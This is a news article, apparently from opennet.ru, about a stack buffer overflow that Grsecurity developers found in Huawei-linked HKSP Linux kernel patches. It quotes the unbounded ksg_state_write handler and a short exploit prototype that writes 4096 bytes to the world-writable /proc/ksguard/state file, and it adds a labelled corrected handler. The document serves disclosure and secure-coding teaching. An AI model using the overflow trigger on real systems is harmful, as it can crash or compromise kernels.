Security issues in patches proposed by a Huawei employee to protect the Linux kernel

Developers of the Grsecurity project have drawn attention to a trivially exploitable vulnerability in HKSP (Huawei Kernel Self Protection), a patch set proposed a few days ago to improve the security of the Linux kernel. The situation is reminiscent of the Samsung case, in which an attempt to improve system security introduced a new vulnerability and made it easier to compromise devices.

The HKSP patches were published by a Huawei employee whose GitHub profile mentions Huawei, and the project name itself uses the word Huawei (HKSP - Huawei Kernel Self Protection). At the same time, Huawei representatives denied any connection between the HKSP project and the company, stating that the code was developed on the employee's personal initiative, is not an official Huawei project and is not used in the company's products. After the vulnerability was discovered, a note was retroactively added to the HKSP GitHub page stating that the project is being developed in the author's spare time for research purposes.

HKSP includes changes such as randomization of offsets in the cred structure, protection against attacks on the user identifier namespace (pid namespace), separation of the process stack from the mmap area, detection of double kfree calls, blocking of leaks through the /proc pseudo-FS (/proc/{modules,keys,key-users}, /proc/sys/kernel/*, /proc/sys/vm/mmap_min_addr and /proc/kallsyms), improved user-space address randomization, additional ptrace protection, enhanced SMAP and SMEP protection, the ability to prohibit sending data via raw sockets, blocking of incorrect addresses in UDP sockets, and integrity checking of running processes. It also includes the Ksguard kernel module, which aims to detect attempts to install typical rootkits.

The patches drew the interest of Greg Kroah-Hartman, who maintains the stable branch of the Linux kernel; he asked the author to split the monolithic patch into parts to simplify review and inclusion in the mainline kernel. Kees Cook, who leads the project to promote active protection technologies in the Linux kernel, also responded positively to the patches, but among the problems he noted the binding to the x86 architecture and the notification-only nature of many modes, which merely log information about a problem without attempting to block it.

A study of the patch by Grsecurity developers revealed many errors and weaknesses in the code, and also showed the absence of a threat model that would allow the project's capabilities to be judged adequately. To demonstrate clearly that the code was written without secure programming practices, they cite a trivial vulnerability in the handler for the file /proc/ksguard/state, which is created with permissions 0777, meaning that everyone has write access. The ksg_state_write function, used to parse commands written to /proc/ksguard/state, creates a tmp[32] buffer into which data is copied according to the length passed in by the caller, without taking the size of the target buffer into account and without checking that parameter against the string size. In other words, to overwrite part of the kernel stack, an attacker only needs to write a specially formatted line to /proc/ksguard/state.

static ssize_t ksg_state_write(struct file *file, const char __user *buf,
                               size_t len, loff_t *offset)
{
        u64 value;
        char tmp[32];
        size_t n = 0;

        if (copy_from_user(tmp, buf, len))
                return -1;

        value = simple_strtoul(tmp, '\0', 10);
        ...

Exploit prototype:

#include <fcntl.h>
#include <unistd.h>

char buf[4096] = { };
int fd = open("/proc/ksguard/state", O_WRONLY);
if (fd >= 0) {
        write(fd, buf, sizeof(buf));
        close(fd);
}
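For contrast with the handler quoted above, the following is an added example (not HKSP code and not part of the original article) showing how such a /proc write handler should bound its input. It is a userspace C model: memcpy() stands in for copy_from_user(), the function names safe_state_write, oversized_write_rejected and parse_or_max are hypothetical, and the 4096-byte input mirrors the write from the published prototype. The point is the length check against the fixed tmp buffer that the reported handler omitted.

```c
/*
 * Added example: a userspace model of a bounded /proc/ksguard/state write
 * handler. This is NOT HKSP code. memcpy() stands in for copy_from_user(),
 * and the function names are hypothetical. In a real module the entry would
 * also be created with a restrictive mode (e.g. 0600 instead of 0777) so that
 * unprivileged users cannot reach the handler at all.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#define KSG_STATE_MAX 32   /* same fixed-size stack buffer as the reported handler */

/*
 * Parse an unsigned decimal command written by the user.
 * Returns the number of bytes consumed, or a negative errno value.
 * The reported handler copied `len` bytes into tmp[32] unconditionally;
 * here the length is checked against the buffer before any copy happens.
 */
static ssize_t safe_state_write(const char *ubuf, size_t len, uint64_t *value)
{
    char tmp[KSG_STATE_MAX];
    char *end;

    /* The missing check: input must fit together with a terminating NUL. */
    if (len == 0 || len >= sizeof(tmp))
        return -EINVAL;

    memcpy(tmp, ubuf, len);    /* copy_from_user(tmp, ubuf, len) in the kernel */
    tmp[len] = '\0';           /* the string parser needs a terminated buffer */

    /* Accept the single trailing newline that `echo 42 > file` produces. */
    if (tmp[len - 1] == '\n')
        tmp[len - 1] = '\0';

    errno = 0;
    *value = strtoull(tmp, &end, 10);
    if (errno != 0 || end == tmp || *end != '\0')
        return -EINVAL;        /* empty, out of range, or trailing garbage */

    return (ssize_t)len;
}

/* Constructed input: a 4096-byte write like the one in the published prototype. */
static int oversized_write_rejected(void)
{
    char big[4096];
    uint64_t v = 0;

    memset(big, 'A', sizeof(big));
    return safe_state_write(big, sizeof(big), &v) == -EINVAL;
}

/* Convenience wrapper: parsed value, or UINT64_MAX when the input is rejected. */
static uint64_t parse_or_max(const char *s)
{
    uint64_t v = 0;

    if (safe_state_write(s, strlen(s), &v) < 0)
        return UINT64_MAX;
    return v;
}

int main(void)
{
    printf("4096-byte write rejected: %s\n", oversized_write_rejected() ? "yes" : "no");
    printf("\"42\\n\" -> %llu\n", (unsigned long long)parse_or_max("42\n"));
    printf("\"12abc\" rejected: %s\n", parse_or_max("12abc") == UINT64_MAX ? "yes" : "no");
    return 0;
}
```

In a kernel module the same shape applies: check len against sizeof(tmp) before copy_from_user(), NUL-terminate, and return -EFAULT on a failed copy rather than -1; kstrtoull_from_user() bundles the bounded copy and strict parsing into one call. Creating the entry with proc_create() and a 0600 mode removes the unprivileged write path entirely, so the parser is never reached by arbitrary users.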

Source: opennet.ru
